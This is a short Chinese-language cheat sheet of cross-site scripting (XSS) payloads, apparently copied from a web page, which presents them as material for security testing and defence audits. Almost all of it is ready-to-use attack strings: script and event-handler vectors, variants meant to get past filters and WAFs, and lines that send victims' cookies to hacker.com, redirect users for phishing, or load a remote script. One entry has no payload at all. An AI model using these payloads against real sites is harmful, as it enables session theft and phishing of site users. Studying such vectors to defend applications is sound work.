XSS Payloads

精选各种场景下的 XSS 向量，用于安全测试与防御审计。

基础向量 (Basic)

Payload

<script>alert(1)</script>

# 标准脚本执行

已复制

Payload

<img src=x onerror=alert(1)>

# 利用事件处理器

已复制

SVG 脚本

<svg onload=alert(1)>

# XML 命名空间执行

已复制

伪协议

<a href="javascript:alert(1)">Click</a>

# URL 伪协议触发

已复制

反引号

# 绕过括号过滤

已复制

实体编码

<img src=x onerror="alert(1)">

# 绕过明文检测

已复制

不完整标签

<svg/onload=alert(1)>

# 绕过基础 WAF

已复制

混合大小写

<ScRiPt>alert(1)</sCrIpT>

# 绕过正则匹配

已复制

Cookie 获取

<script>new Image().src="http://hacker.com/l?c="+document.cookie;</script>

# 窃取会话令牌

已复制

页面重定向

<script>window.location="http://hacker.com"</script>

# 钓鱼/劫持

已复制

远程加载

<script src="http://hacker.com/e.js"></script>

# 执行外部脚本

已复制